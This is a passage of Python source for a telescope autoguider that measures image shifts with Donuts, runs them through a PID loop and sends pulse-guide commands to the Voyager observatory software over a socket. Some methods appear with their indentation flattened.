    guide_thread = threading.Thread(target=self.__guide_loop)
    guide_thread.daemon = True
    guide_thread.start()

    # open the socket to Voyager
    self.__open_socket()

    # keep it alive and listen for jobs
    self.__keep_socket_alive()

    # set guiding status to IDLE
    self._status = DonutsStatus.IDLE

    # loop until told to stop
    while True:
        # end on ctrl+c
        # BUG FIX: this previously called EXIT_EVENT.set(), which *sets*
        # the event (and returns None, so the loop never broke);
        # is_set() only checks the flag
        if EXIT_EVENT.is_set():
            break

        # listen for a response or a new job to do
        rec = self.__receive_until_delim()

        # was there a command? If so, do something, else, do nothing/keep alive
        if rec:
            # handle events
            if 'Event' in rec:
                # do nothing for events that just give us some info
                if rec['Event'] in self._INFO_SIGNALS:
                    logging.debug(f"RECEIVED: {rec}")

                # handle the autoguider calibration event
                elif rec['Event'] == "DonutsCalibrationRequired":
                    self._status = DonutsStatus.CALIBRATING
                    self.__send_donuts_message_to_voyager("DonutsCalibrationStart")
                    # run the calibration process
                    self.__calibrate_donuts()
                    # send the calibration done message
                    self.__send_donuts_message_to_voyager("DonutsCalibrationDone")
                    self._status = DonutsStatus.IDLE

                # handle the autoguiding event
                elif rec['Event'] == "DonutsRecenterRequired":
                    logging.debug(f"RECEIVED: {rec}")
                    # if guider is IDLE, do stuff, otherwise do nothing
                    if self._status == DonutsStatus.IDLE:
                        # set the current mode to guiding
                        self._status = DonutsStatus.GUIDING
                        # send a DonutsRecenterStart reply
                        self.__send_donuts_message_to_voyager("DonutsRecenterStart")

                        # make a containerised version of the file path and
                        # keep a local copy of the image to guide on's path
                        host_path = rec[self._voyager_path_keyword]
                        last_image = self.__resolve_container_path("data", host_path)

                        # set the latest image and notify the guide loop thread to wake up
                        with self._guide_condition:
                            self._latest_guide_frame = last_image
                            self._guide_condition.notify()

                        # fetch the results from the queue (blocks until
                        # the guide thread has processed the frame)
                        direction, duration = self._results_queue.get()

                        # only try guiding if a valid correction was returned, otherwise, do nothing
                        if duration['x'] != 0 or duration['y'] != 0:
                            logging.info(f"CORRECTION: {direction['x']}:{duration['x']} {direction['y']}:{duration['y']}")
                            # send a pulseGuide command followed by a loop for responses
                            # this must be done before the next command can be sent
                            # if both are sent ok, we send the DonutsRecenterDone, otherwise we send an error
                            try:
                                # make x correction message
                                uuid_x = str(uuid.uuid4())
                                message_x = self._msg.pulse_guide(uuid_x, self._comms_id, direction['x'], duration['x'])
                                # send x correction
                                self.__send_two_way_message_to_voyager(message_x)
                                self._comms_id += 1

                                # make y correction message
                                uuid_y = str(uuid.uuid4())
                                message_y = self._msg.pulse_guide(uuid_y, self._comms_id, direction['y'], duration['y'])
                                # send the y correction
                                self.__send_two_way_message_to_voyager(message_y)
                                self._comms_id += 1

                                # send a DonutsRecenterDone message
                                self.__send_donuts_message_to_voyager("DonutsRecenterDone")
                            except Exception:
                                # send a recentering error
                                self.__send_donuts_message_to_voyager("DonutsRecenterError", f"Failed to PulseGuide {last_image}")
                                traceback.print_exc()
                        else:
                            logging.info(f"No guide correction returned for {last_image}, skipping and sending DonutsRecenterDone...")
                            # send a DonutsRecenterDone message
                            self.__send_donuts_message_to_voyager("DonutsRecenterDone")

                        # set the current mode back to IDLE
                        self._status = DonutsStatus.IDLE

                    # ignore commands if we're already doing something
                    else:
                        logging.warning("Donuts is busy, skipping...")
                        # send Voyager a start and a done command to keep it happy
                        self.__send_donuts_message_to_voyager("DonutsRecenterStart")
                        self.__send_donuts_message_to_voyager("DonutsRecenterDone")

                # handle the abort event
                elif rec['Event'] == "DonutsAbort":
                    logging.info(f"RECEIVED: {rec}")
                    logging.info("EVENT: Donuts abort requested, dying peacefully")
                    # close the socket
                    self.__close_socket()
                    # exit
                    sys.exit(0)

            # erm, something has gone wrong
            else:
                logging.error('Oh dear, something unforseen has occurred. Here\'s what...')
                logging.error(f"Failed parsing {rec}")

        # do we need to poll again?
        now = time.time()
        time_since_last_poll = now - self._last_poll_time
        if time_since_last_poll > 5:
            # ping the keep alive
            self.__keep_socket_alive()
@staticmethod
def __dec_str_to_deg(declination):
"""
Convert DD MM SS.ss into DD.dddd
"""
d, m, s = declination.split(' ')
if d[0] == '-':
return int(d) - float(m)/60. - float(s)/3600.
else:
return int(d) + float(m)/60. + float(s)/3600.
def __guide_loop(self):
    """
    Analyse incoming images for guiding offsets.
    Results are communicated to the main run thread
    using the results_queue

    Parameters
    ----------
    None

    Returns
    -------
    None

    Raises
    ------
    None
    """
    while True:
        # end on ctrl+c
        # BUG FIX: this previously called EXIT_EVENT.set(), which *sets*
        # the event (and returns None, so the loop never broke);
        # is_set() only checks the flag
        if EXIT_EVENT.is_set():
            break

        # block until a frame is available for processing
        with self._guide_condition:
            while self._latest_guide_frame is None:
                self._guide_condition.wait()
            last_image = self._latest_guide_frame

        # check if we're still observing the same field
        # pylint: disable=no-member
        with fits.open(last_image) as ff:
            # current field and filter?
            current_filter = ff[0].header[self.filter_keyword]
            current_field = ff[0].header[self.field_keyword]
            current_xbin = ff[0].header[self.xbin_keyword]
            current_ybin = ff[0].header[self.ybin_keyword]
            declination = ff[0].header[self.dec_keyword]
            self._declination = self.__dec_str_to_deg(declination)
        # pylint: enable=no-member

        # if something changes or we haven't started yet, sort out a reference image
        if current_field != self._last_field or current_filter != self._last_filter or \
            current_xbin != self._last_xbin or current_ybin != self._last_ybin or self._donuts_ref is None:
            # reset PID loop to unstabilised state
            self.__initialise_pid_loop(stabilised=False)
            # reset the guide buffer
            self.__initialise_guide_buffer()
            # reset stabilised flag
            self._stabilised = False

            # look for a reference image for this field, filter, binx and biny
            self._ref_file = vdb.get_reference_image_path(current_field, current_filter,
                                                          current_xbin, current_ybin)
            # if we have a reference, use it. Otherwise store this image as the new reference frame
            if self._ref_file is not None:
                do_correction = True
            else:
                # set the last image as reference
                self._ref_file = last_image
                ref_filename = self._ref_file.split('/')[-1]
                # copy it to the special storage area
                copyfile(self._ref_file, f"{self.reference_root}/{ref_filename}")
                # set the copied image to the reference in the database
                # NOTE(review): this registers the *data* path, not the copy
                # under reference_root -- confirm vdb re-roots the path
                vdb.set_reference_image(self._ref_file, current_field, current_filter,
                                        current_xbin, current_ybin)
                # skip correction as the new reference is this current image
                do_correction = False
            # make this image the reference, update the last field/filter also
            self._donuts_ref = Donuts(self._ref_file, subtract_bkg=self.donuts_subtract_bkg)
        else:
            do_correction = True

        # update the last field/filter values
        self._last_field = current_field
        self._last_filter = current_filter
        self._last_xbin = current_xbin
        self._last_ybin = current_ybin

        # do the correction if required
        if do_correction:
            # work out shift here
            shift = self._donuts_ref.measure_shift(last_image)
            logging.info(f"Raw shift measured: x:{shift.x.value:.2f} y:{shift.y.value:.2f}")
            # process the shifts and add the results to the queue
            direction, duration = self.__process_guide_correction(shift)
            # add the post-PID values to the results queue
            self._results_queue.put((direction, duration))
        else:
            # return a null correction and do nothing
            direction = {"x": self.guide_directions["+x"],
                         "y": self.guide_directions["+y"]}
            duration = {"x": 0, "y": 0}
            self._results_queue.put((direction, duration))

        # set this to None for the next image
        self._latest_guide_frame = None
def __open_socket(self):
    """
    Establish the TCP connection to the Voyager application server.

    On failure the process exits with status 1 -- without Voyager
    there is nothing to guide.
    """
    self.socket = s.socket(s.AF_INET, s.SOCK_STREAM)
    # short timeout so receive loops stay responsive
    self.socket.settimeout(1.0)
    endpoint = (self.socket_ip, self.socket_port)
    try:
        self.socket.connect(endpoint)
    except s.error:
        logging.fatal('Voyager socket connect failed!')
        logging.fatal('Check the application interface is running!')
        traceback.print_exc()
        sys.exit(1)
def __close_socket(self):
"""
Close the socket once finished
Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
self.socket.close()
def __send(self, message, n_attempts=3):
"""
Low level message sending method. Note no listening
is done here.
Parameters
----------
message : string
message to communicate to Voyager
n_attempts: int, optional
default = 3
max number of tries to send, before giving up
Returns
-------
sent : boolean
Did the message send ok?
True or False
Raises
------
None
"""
sent = False
while not sent and n_attempts > 0:
n_attempts -= 1
try:
# send the command
self.socket.sendall(bytes(message, encoding='utf-8'))
sent = True
# update the last poll time
self._last_poll_time = time.time()
logging.debug(f"SENT: {message.rstrip()}")
except:
logging.error(f"CANNOT SEND {message} TO VOYAGER [{n_attempts}]")
traceback.print_exc()
sent = False
return sent
def __receive(self, n_bytes=2048):
"""
Receive a message of n_bytes in length from Voyager
Parameters
----------
n_bytes : int, optional
Number of bytes to read from socket
default = 2048
Returns
-------
message : dict
json parsed response from Voyager
Raises
------
None
"""
# NOTE original code, we have JSON decoding errors, trying to figure it out
#try:
# message = json.loads(self.socket.recv(n_bytes))
#except s.timeout:
# message = {}
#return message
# load the raw string
try:
message_raw = self.socket.recv(n_bytes)
except s.timeout:
message_raw = ""
# spit out the raw message
logging.debug(f"__receive: message_raw={message_raw}")
# unpack it into a json object
if message_raw != "":
# NOTE sometimes a message is truncated, try to stop it crashing...
try:
message = json.loads(message_raw)
except json.decoder.JSONDecodeError:
message = {}
else:
message = {}
return message
def __receive_until_delim(self, delim=b'\r\n'):
"""
"""
message_buffer = []
n_bytes = 2048
# check if there is any overflow from last time
logging.debug(f"Message overflow {self.message_overflow}")
for msg in self.message_overflow:
logging.debug(f"Moving {msg} to __receive_until_delim message_buffer...")
message_buffer.append(msg)
# reset the overflow
self.message_overflow = []
logging.debug(f"Reset message overflow to {self.message_overflow}")
continue_reading = True
logging.info("Starting read until delim...")
while continue_reading:
try:
message_raw = self.socket.recv(n_bytes)
except s.timeout:
message_raw = b''
logging.debug(f"Message raw {message_raw}")
if delim in message_raw:
logging.debug("DELIM FOUND...")
continue_reading = False
message_end, message_new_start = message_raw.split(b'\r\n')
logging.debug(f"Message raw parts {message_end} : {message_new_start}")
message_buffer.append(message_end)
logging.debug(f"Message buffer: {message_buffer}")
self.message_overflow.append(message_new_start)
logging.debug(f"Message overflow: {self.message_overflow}")
else:
logging.debug("DELIM NOT FOUND, CONTINUING READING...")
continue_reading = True
message_buffer.append(message_raw)
logging.debug(f"Message buffer: {message_buffer}")
logging.info("Done reading until delim...")
message_str = b''.join(message_buffer)
logging.info(f"Final message string: {message_str}")
return json.loads(message_str)
def __keep_socket_alive(self):
"""
Convenience method to keep socket open.
Voyager's internal polling is reset upon
receipt of this message
Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
now = str(time.time())
polling = {"Event": "Polling",
"Timestamp": now,
"Host": self.host,
"Inst": self.inst}
# send the polling string
polling_str = json.dumps(polling) + "\r\n"
_ = self.__send(polling_str)
@staticmethod
def __parse_jsonrpc(response):
"""
Take a jsonrpc response and figure out
what happened. If there is an error result is
missing and error object is there instead
Parameters
----------
response : dict
jsonrpc response from Voyager
Returns
-------
rec_idd : int
response_id, used to match async commands/responses
result : int
result code, 0 = ok, all else = not ok
error_code : int
used to determine type of error
error_msg : string
description of any error
Raises
------
None
"""
# get the response ID
rec_idd = response['id']
try:
result = response['result']
error_code = None
error_msg = None
except KeyError:
result = -1
error_code = response['error']['code']
error_msg = response['error']['message']
return rec_idd, result, error_code, error_msg
@staticmethod
def __parse_remote_action_result(response):
"""
Take a remote action result and see what happened
Parameters
----------
response : dict
Voyager RemoteActionResult response
Returns
-------
uid : string
unique id for the corresponding command
result : int
result code, 4 = ok, all else = not ok
motivo : string
description of any error
param_ret : dict
parameters returned by command
Raises
------
None
"""
result = response['ActionResultInt']
uid = response['UID']
motivo = response['Motivo']
param_ret = response['ParamRet']
return uid, result, motivo, param_ret
def __send_donuts_message_to_voyager(self, event, error=None):
"""
Acknowledge a command from Voyager
Parameters
----------
event : string
name of event to send to Voyager
error : string, optional
description of donuts error
default = None
Returns
-------
None
Raises
------
None
"""
now = str(time.time())
message = {"Event": event,
"Timestamp": now,
"Host": self.host,
"Inst": self.inst}
if error is not None:
message['DonutsError'] = error
# send the command
msg_str = json.dumps(message) + "\r\n"
_ = self.__send(msg_str)
def __send_abort_message_to_voyager(self, uid, idd):
"""
If things go pear shaped and donuts is quitting,
tell Voyager to abort this UID:IDD also
Parameters
----------
uid : string
unique ID for this command
idd : int
unique ID for this command
Returns
-------
None
Raises
------
None
"""
message = {'method': 'RemoteActionAbort',
'params': {'UID': uid},
'id': idd}
msg_str = json.dumps(message) + "\r\n"
# send the command
_ = self.__send(msg_str)
    def __send_two_way_message_to_voyager(self, message):
        """
        Issue any two way command to Voyager
        Wait for the initial jsonrpc response, act accordingly
        If all good, wait for the RemoteActionResult event, act accordingly
        The helper Message class (above) allows for easy creation
        of the message objects (dictionaries) to pass to this method

        Two acknowledgements are required before this method returns:
        1. a jsonrpc response matching our command id (idd)
        2. a RemoteActionResult event matching our command uid

        Parameters
        ----------
        message : dict
            A message object containing the relevant json info
            for the command we want to send to Voyager

        Returns
        -------
        None

        Raises
        ------
        Exception : When unable to send message
        """
        # grab this message's UID and ID values
        uid = message['params']['UID']
        idd = message['id']
        msg_str = json.dumps(message) + "\r\n"
        # initialise an empty response class
        # add the OK status we want to see returned
        response = Response(uid, idd, self._msg.OK)
        # loop until both responses are received
        cb_loop_count = 0
        while not response.uid_recv:
            # loop until we get a valid response to issuing a command
            while not response.idd_recv:
                # try sending the message and then waiting for a response
                # (__send retries internally; keep trying until it succeeds)
                sent = False
                while not sent:
                    # send the command
                    sent = self.__send(msg_str)
                    if sent:
                        logging.debug(f"CALLBACK ADD: {uid}:{idd}")
                logging.debug(f"JSONRPC CALLBACK LOOP [{cb_loop_count+1}]: {uid}:{idd}")
                rec = self.__receive_until_delim()
                # handle the jsonrpc response (1 of 2 responses needed)
                if "jsonrpc" in rec.keys():
                    logging.debug(f"RECEIVED: {rec}")
                    rec_idd, result, err_code, err_msg = self.__parse_jsonrpc(rec)
                    # we only care about IDs for the commands we just sent right now
                    if rec_idd == idd:
                        # result = 0 means OK, anything else is bad
                        # leave this jsonrpc check hardcoded
                        if result != 0:
                            logging.error(f"Problem with command id: {idd}")
                            logging.error(f"{err_code} {err_msg}")
                            # Leo said if result!=0, we have a serious issue. Therefore abort.
                            self.__send_abort_message_to_voyager(uid, idd)
                            raise Exception(f"ERROR: Could not send message {msg_str}")
                        else:
                            logging.debug(f"Command id: {idd} returned correctly")
                            # add the response if things go well. if things go badly we're quitting anyway
                            response.idd_received(result)
                    else:
                        logging.warning(f"Waiting for idd: {idd}, ignoring response for idd: {rec_idd}")
                # increment loop counter to keep track of how long we're waiting
                cb_loop_count += 1
            # if we exit the while loop above we can assume that
            # we got a jsonrpc response to the pulse guide command
            # here we start listening for it being done
            logging.debug(f"EVENT CALLBACK LOOP [{cb_loop_count+1}]: {uid}:{idd}")
            rec = self.__receive_until_delim()
            # handle the RemoteActionResult response (2 of 2 needed)
            if "Event" in rec.keys():
                if rec['Event'] == "RemoteActionResult":
                    logging.debug(f"RECEIVED: {rec}")
                    rec_uid, result, *_ = self.__parse_remote_action_result(rec)
                    # check we have a response for the thing we want
                    if rec_uid == uid:
                        # result = 4 means OK, anything else is an issue
                        if result != self._msg.OK:
                            logging.error(f"Problem with command uid: {uid}")
                            logging.error(f"{rec}")
                            # TODO: Consider adding a RemoteActionAbort here if shit hits the fan
                        else:
                            logging.debug(f"Command uid: {uid} returned correctly")
                        # add the response, regardless if it's good or bad, so we can end this loop
                        response.uid_received(result)
                    else:
                        logging.warning(f"Waiting for uid: {uid}, ignoring response for uid: {rec_uid}")
                elif rec['Event'] in self._INFO_SIGNALS:
                    logging.debug(f"RECEIVED: {rec}")
                else:
                    logging.warning(f"Unknown response {rec}")
            # no response? do nothing
            elif not rec.keys():
                pass
            else:
                logging.warning(f"Unknown response {rec}")
            # keep the connection alive while waiting
            now = time.time()
            time_since_last_poll = now - self._last_poll_time
            if time_since_last_poll > 5:
                # ping the keep alive
                self.__keep_socket_alive()
            # increment event loop counter
            cb_loop_count += 1
        # check was everything ok and raise an exception if not
        if not response.all_ok():
            raise Exception(f"ERROR: Could not send message {msg_str}")
    def __calibration_filename(self, direction, pulse_time):
        """
        Return a calibration filename

        Parameters
        ----------
        direction : string
            Direction of offset applied to this calibration image
        pulse_time : int
            Number of ms the telescope was pulse guided for
            in the direction above

        Returns
        -------
        path : string
            Filename/path to use for saving a calibration image

        Raises
        ------
        None
        """
        return f"{self._calibration_dir}/step_{self._image_id:06d}_d{direction}_{pulse_time}ms{self.image_extension}"
@staticmethod
def __determine_shift_direction_and_magnitude(shift):
"""
Take a donuts shift object and work out
the direction of the shift and the distance
Parameters
----------
shift : Donuts.shift
A shift object containing the offset between
two images from Donuts
Returns
-------
direction : string
The direction of the offset
magnitude : float
The magnitude of the shift in pixels
Raises
------
None
"""
sx = shift.x.value
sy = shift.y.value
if abs(sx) > abs(sy):
if sx > 0:
direction = '-x'
else:
direction = '+x'
magnitude = abs(sx)
else:
if sy > 0:
direction = '-y'
else:
direction = '+y'
magnitude = abs(sy)
return direction, magnitude
@staticmethod
def __append_to_file(path, line):
"""
Take a line and append it to a file
Parameters
----------
path : str
path to file to append to
line : str
line to append to file
Returns
-------
None
Raises
------
None
"""
with open(path, 'a') as of:
of.write(line)
    def __calibrate_donuts(self):
        """
        Run the calibration routine. Here we take an
        image, nudge the telescope, take another and
        repeat for the 4 directions. Then we use donuts
        to determine the shift and calibrate the pulse
        guide command.

        Results (direction consistency and ms/pixel scales)
        are logged and appended to a calibration results file.

        Parameters
        ----------
        None

        Returns
        -------
        None

        Raises
        ------
        None
        """
        # set up objects to hold calib info
        self._direction_store = defaultdict(list)
        self._scale_store = defaultdict(list)
        # set up calibration directory
        self._calibration_dir = vutils.get_data_dir(self.calibration_root, windows=False)
        # set up a calibration output filename in that directory
        tnow = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')
        self._calibration_results_path = f"{self._calibration_dir}/donuts_calibration_{tnow}.txt"
        # point the telescope to 1h west of the meridian
        # get the reference filename
        filename_cont = self.__calibration_filename("R", 0)
        filename_host = self.__resolve_host_path("calib", filename_cont)
        # create a command uuid
        shot_uuid = str(uuid.uuid4())
        # take an image at the current location
        try:
            message_shot = self._msg.camera_shot(shot_uuid, self._comms_id, self.calibration_exptime, "true", filename_host)
            self.__send_two_way_message_to_voyager(message_shot)
            self._comms_id += 1
            self._image_id += 1
        except Exception:
            # NOTE(review): on failure the error is reported but the (possibly
            # missing) image is still used as the reference below - confirm
            self.__send_donuts_message_to_voyager("DonutsCalibrationError", f"Failed to take image {filename_host}")
        # make the image we took the reference image
        donuts_ref = Donuts(filename_cont, subtract_bkg=self.donuts_subtract_bkg)
        # loop over the 4 directions for the requested number of iterations
        for _ in range(self.calibration_n_iterations):
            for i in range(4):
                # pulse guide in direction i
                try:
                    uuid_i = str(uuid.uuid4())
                    message_pg = self._msg.pulse_guide(uuid_i, self._comms_id, i, self.calibration_step_size_ms)
                    # send pulse guide command in direction i
                    self.__send_two_way_message_to_voyager(message_pg)
                    self._comms_id += 1
                except Exception:
                    # send a recentering error
                    self.__send_donuts_message_to_voyager("DonutsRecenterError", f"Failed to PulseGuide {i} {self.calibration_step_size_ms}")
                    traceback.print_exc()
                # take an image
                try:
                    # get the filenames
                    filename_cont = self.__calibration_filename(i, self.calibration_step_size_ms)
                    filename_host = self.__resolve_host_path("calib", filename_cont)
                    shot_uuid = str(uuid.uuid4())
                    message_shot = self._msg.camera_shot(shot_uuid, self._comms_id, self.calibration_exptime, "true", filename_host)
                    self.__send_two_way_message_to_voyager(message_shot)
                    self._comms_id += 1
                    self._image_id += 1
                except Exception:
                    self.__send_donuts_message_to_voyager("DonutsCalibrationError", f"Failed to take image {filename_host}")
                # measure the offset and update the reference image
                shift = donuts_ref.measure_shift(filename_cont)
                direction, magnitude = self.__determine_shift_direction_and_magnitude(shift)
                logging.info(f"SHIFT: {direction} {magnitude}")
                self._direction_store[i].append(direction)
                self._scale_store[i].append(magnitude)
                donuts_ref = Donuts(filename_cont, subtract_bkg=self.donuts_subtract_bkg)
        # now do some analysis on the run from above
        # check that the directions are the same every time for each orientation
        for direc in self._direction_store:
            logging.info(self._direction_store[direc])
            if len(set(self._direction_store[direc])) != 1:
                logging.error(f"ERROR: PROBLEM WITH CALIBRATED DIRECTION {self._direction_store[direc]}")
            logging.info(f"{direc}: {self._direction_store[direc][0]}")
            # write out the direction_store contents for easy finding
            line = f"{direc} {self._direction_store[direc]}\n"
            self.__append_to_file(self._calibration_results_path, line)
        # now work out the ms/pix scales from the calibration run above
        for direc in self._scale_store:
            ratio = self.calibration_step_size_ms/np.average(self._scale_store[direc])
            logging.info(f"{direc}: {ratio:.2f} ms/pixel")
            # write out the scale_store contents for easy finding
            line = f"{direc}: {self._scale_store[direc]}\n"
            self.__append_to_file(self._calibration_results_path, line)
            # write out the average correction too
            line = f"{direc}: {ratio:.2f} ms/pixel\n"
            self.__append_to_file(self._calibration_results_path, line)
        # print out the storage areas for reference in case some bad measurements were made
        for direc in self._direction_store:
            logging.info(f"Direction store: {direc} {self._direction_store[direc]}")
            logging.info(f"Scale store: {direc} {self._scale_store[direc]}")
def __initialise_pid_loop(self, stabilised):
"""
(Re)initialise the PID loop objects
for the X and Y directions
Parameters
----------
stabilised : boolean
Are we stabilised or not?
Returns
-------
None
Raises
------
None
"""
if stabilised:
# initialise the PID loop with the coeffs from config
self._pid_x = PID(self.pid_x_p, self.pid_x_i, self.pid_x_d)
self._pid_y = PID(self.pid_y_p, self.pid_y_i, self.pid_y_d)
else:
# force 100% proportional during stabilisation
self._pid_x = PID(1.0, 0.0, 0.0)
self._pid_y = PID(1.0, 0.0, 0.0)
# set the PID set points (typically 0)
self._pid_x.setPoint(self.pid_x_setpoint)
self._pid_y.setPoint(self.pid_y_setpoint)
def __initialise_guide_buffer(self):
"""
(Re) initialise the ag measurement buffer.
Clears the buffer lists for a new field/filter
Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
self._buff_x = []
self._buff_y = []
def __get_null_correction(self):
"""
Return an empty correction
Parameters
----------
None
Returns
-------
direction : dict
Direction object for correction
duration : dict
Duration object for correction
Raises
------
None
"""
direction = {"x": self.guide_directions["+x"],
"y": self.guide_directions["+y"]}
duration = {"x": 0, "y": 0}
return direction, duration
def __truncate_correction(self, x, y):
"""
Apply a pass filter on the corrections
if needed.
Parameters
----------
x : float
X correction
y : float
Y correction
Returns
-------
xt : float
Filtered x correction (if needed)
yt : float
Filtered y correction (if needed)
Raises
------
None
"""
# filter x
if x >= self.max_error_pixels:
xt = self.max_error_pixels
elif x <= -self.max_error_pixels:
xt = -self.max_error_pixels
else:
xt = x
# filter y
if y >= self.max_error_pixels:
yt = self.max_error_pixels
elif y <= -self.max_error_pixels:
yt = -self.max_error_pixels
else:
yt = y
return xt, yt
def __determine_direction_and_duration(self, x, y, cos_dec):
"""
Take the correction in X and Y in pixels
and convert it to a direction and duration object
for pulse guide
Parameters
----------
x : float
X correction
y : float
Y correction
Returns
-------
direction : dict
direction object for correction
duration : dict
duration object for correction
Raises
------
None
"""
# determine the directions and scaled shifr magnitudes (in ms) to send
# abs() on -ve duration otherwise throws back an error
if 0 < x <= self.max_error_pixels:
guide_time_x = x * self.pixels_to_time['+x']
if self.ra_axis == 'x':
guide_time_x = guide_time_x/cos_dec
guide_direction_x = self.guide_directions["+x"]
elif 0 > x >= -self.max_error_pixels:
guide_time_x = abs(x * self.pixels_to_time['-x'])
if self.ra_axis == 'x':
guide_time_x = guide_time_x/cos_dec
guide_direction_x = self.guide_directions["-x"]
else:
guide_time_x = 0
guide_direction_x = self.guide_directions["+x"]
if 0 < y <= self.max_error_pixels:
guide_time_y = y * self.pixels_to_time['+y']
if self.ra_axis == 'y':
guide_time_y = guide_time_y/cos_dec
guide_direction_y = self.guide_directions["+y"]
elif 0 > y >= -self.max_error_pixels:
guide_time_y = abs(y * self.pixels_to_time['-y'])
if self.ra_axis == 'y':
guide_time_y = guide_time_y/cos_dec
guide_direction_y = self.guide_directions["-y"]
else:
guide_time_y = 0
guide_direction_y = self.guide_directions["+y"]
# bake these final values into the direction/duration results
direction = {"x": guide_direction_x,
"y": guide_direction_y}
duration = {"x": guide_time_x,
"y": guide_time_y}
return direction, duration
    def __process_guide_correction(self, shift):
        """
        Take a Donuts shift object. Analyse the x and y
        components. Compare them to the recent history of
        corrections and reject outliers. Additionally, pass
        x and y corrections through a PID loop and trim results
        to the max allowed guide correction, if required

        Parameters
        ----------
        shift : Donuts.shift object
            Contains the X and Y offset values for a
            recently analysed image

        Returns
        -------
        direction : dict
            Correction directions to apply for X and Y
        duration : dict
            Correction pulse guide durations to apply
            for X and Y

        Raises
        ------
        None
        """
        # get x and y from shift object
        shift_x = shift.x.value
        shift_y = shift.y.value
        # handle big shifts during stabilisation and when stabilised
        if (abs(shift_x) > self.max_error_pixels or abs(shift_y) > self.max_error_pixels) and self._stabilised:
            logging.warning(f"Offset larger than max allowed shift {self.max_error_pixels}: x: {shift_x} y:{shift_y}")
            logging.warning("Skipping this correction...")
            # make a shift arguments tuple to store in the database
            # (pid/final values zeroed; trailing flags mark the correction as culled)
            shift_args = (self._ref_file, self._latest_guide_frame, self._stabilised, shift_x, shift_y,
                          0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1, 1)
            # log the culled correction to the database
            vdb.log_shifts_to_db(shift_args)
            direction, duration = self.__get_null_correction()
            return direction, duration
        # if we're stabilising, limit big shifts to the max value during this phase
        elif (abs(shift_x) > self.max_error_pixels or abs(shift_y) > self.max_error_pixels) and not self._stabilised:
            # if x is too big, limit it
            pre_pid_x, pre_pid_y = self.__truncate_correction(shift_x, shift_y)
        else:
            pre_pid_x = shift_x
            pre_pid_y = shift_y
        # handle stabilisation
        # NOTE(review): these thresholds compare the *signed* offsets, so a
        # large negative shift (e.g. -10) also counts as "stabilised" -
        # confirm abs() is not intended here
        if not self._stabilised and pre_pid_x < 2 and pre_pid_y < 2:
            # set flag
            self._stabilised = True
            # reset the number of images to stabilise for next time
            self._images_to_stabilise = self.n_images_to_stabilise
            # log a message
            logging.info("Stabilisation complete, reseting PID loop")
            # reset the pid loop
            self.__initialise_pid_loop(stabilised=True)
            # reset the guide buffer
            self.__initialise_guide_buffer()
        # continue trying to stabilise
        elif not self._stabilised and (pre_pid_x > 2 or pre_pid_y > 2) and self._images_to_stabilise >= 0:
            # keep forcing 100% proportional correction
            self.__initialise_pid_loop(stabilised=False)
            self._images_to_stabilise -= 1
        # check if we've been trying to stabilise for too long
        elif not self._stabilised and (pre_pid_x > 2 or pre_pid_y > 2) and self._images_to_stabilise < 0:
            logging.error(f"We've been trying to stabilise >{self.n_images_to_stabilise} images")
            logging.error("There appears to be an error, quiting donuts")
            self.__send_donuts_message_to_voyager("DonutsRecenterError", "Failed to stabilise guiding")
            sys.exit(1)
        else:
            pass
        # get telescope declination to scale RA corrections
        dec_rads = np.radians(self._declination)
        cos_dec = np.cos(dec_rads)
        # handle comparisons to the guide buffer
        # pop the earliest buffer value if > N measurements
        while len(self._buff_x) > self.guide_buffer_length:
            self._buff_x.pop(0)
        while len(self._buff_y) > self.guide_buffer_length:
            self._buff_y.pop(0)
        assert len(self._buff_x) == len(self._buff_y)
        # kill anything that is > sigma_buffer sigma buffer stats, but only after buffer is full
        # otherwise, wait to get better stats
        if len(self._buff_x) < self.guide_buffer_length and len(self._buff_y) < self.guide_buffer_length:
            logging.info("Filling AG stats buffer")
            self._buff_x_sigma = 0.0
            self._buff_y_sigma = 0.0
        else:
            self._buff_x_sigma = np.std(self._buff_x)
            self._buff_y_sigma = np.std(self._buff_y)
            if abs(pre_pid_x) > self.guide_buffer_sigma * self._buff_x_sigma or abs(pre_pid_y) > self.guide_buffer_sigma * self._buff_y_sigma:
                # store the original values in the buffer, even if correction
                # was too big, this will allow small outliers to be caught
                logging.warning(f"Guide correction(s) too large x:{pre_pid_x:.2f} y:{pre_pid_y:.2f}")
                self._buff_x.append(pre_pid_x)
                self._buff_y.append(pre_pid_y)
                # make a shift arguments tuple to store in the database
                shift_args = (self._ref_file, self._latest_guide_frame, self._stabilised, shift_x, shift_y,
                              pre_pid_x, pre_pid_y, 0.0, 0.0, 0.0, 0.0, self._buff_x_sigma, self._buff_y_sigma,
                              1, 1)
                # log the culled correction to the database
                vdb.log_shifts_to_db(shift_args)
                # send back empty correction
                direction, duration = self.__get_null_correction()
                return direction, duration
        # pass corrections through the PID controller
        # update the PID controllers, run them in parallel
        post_pid_x = self._pid_x.update(pre_pid_x) * -1
        post_pid_y = self._pid_y.update(pre_pid_y) * -1
        logging.info(f"PID: x:{post_pid_x:.2f} y:{post_pid_y:.2f}")
        # check if we went over the max allowed shift
        # trim if so, do nothing otherwise
        final_x, final_y = self.__truncate_correction(post_pid_x, post_pid_y)
        logging.info(f"PID[trunc]: x:{final_x:.2f} y:{final_y:.2f}")
        # make a shift arguments tuple to store in the database
        shift_args = (self._ref_file, self._latest_guide_frame, self._stabilised, shift_x, shift_y,
                      pre_pid_x, pre_pid_y, post_pid_x, post_pid_y, final_x, final_y, self._buff_x_sigma,
                      self._buff_y_sigma, 0, 0)
        # log the culled correction to the database
        vdb.log_shifts_to_db(shift_args)
        # convert correction into direction/duration objects
        direction, duration = self.__determine_direction_and_duration(final_x, final_y, cos_dec)
        # store the original pre-pid values in the buffer
        self._buff_x.append(pre_pid_x)
        self._buff_y.append(pre_pid_y)
        return direction, duration
def signal_handler(signum, frame):
    """
    Handle ctrl+c

    Sets the module-level EXIT_EVENT flag so the running
    loop can notice the interrupt and shut down gracefully.
    """
    EXIT_EVENT.set()
if __name__ == "__main__":
    # parse the command line arguments
    args = arg_parse()
    # handle ctrl+c
    signal.signal(signal.SIGINT, signal_handler)
    # load the config file
    config = vutils.load_config(args.config)
    # map the configured logging level string onto the logging constants
    level = logging.DEBUG if config['logging_level'] == 'debug' else logging.INFO
    # send logs to stdout or to a per-night file, as configured
    if config['logging_location'] == 'stdout':
        logging.basicConfig(stream=sys.stdout, level=level)
    else:
